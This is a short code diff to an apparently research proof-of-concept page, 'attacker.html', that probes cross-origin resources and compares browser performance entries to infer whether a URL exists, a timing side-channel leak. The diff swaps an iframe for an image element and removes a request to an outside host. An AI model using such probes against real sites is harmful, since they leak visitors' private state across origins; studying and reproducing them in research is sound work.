--- a/src/poc/attacker.html
+++ b/src/poc/attacker.html
@@ -4,7 +4,7 @@
     
     async function get_diff(url, status) {
       let start = performance.getEntries().length;
-      let element = document.createElement('iframe');
+      let element = document.createElement('img');
       element.src = url;
 
       return new Promise((resolve) => {
@@ -21,10 +21,6 @@
     async function run(url) {
       get_diff(url + 'exists');
       get_diff(url + 'does_not_exist');
-      const req = new XMLHttpRequest();
-      req.open("GET", 'http://ibgang.com:8880/exists');
-      req.open("GET", 'http://ibgang.com:8880/does_not_exist');
-      req.send();
     }
     
     onload = () => {
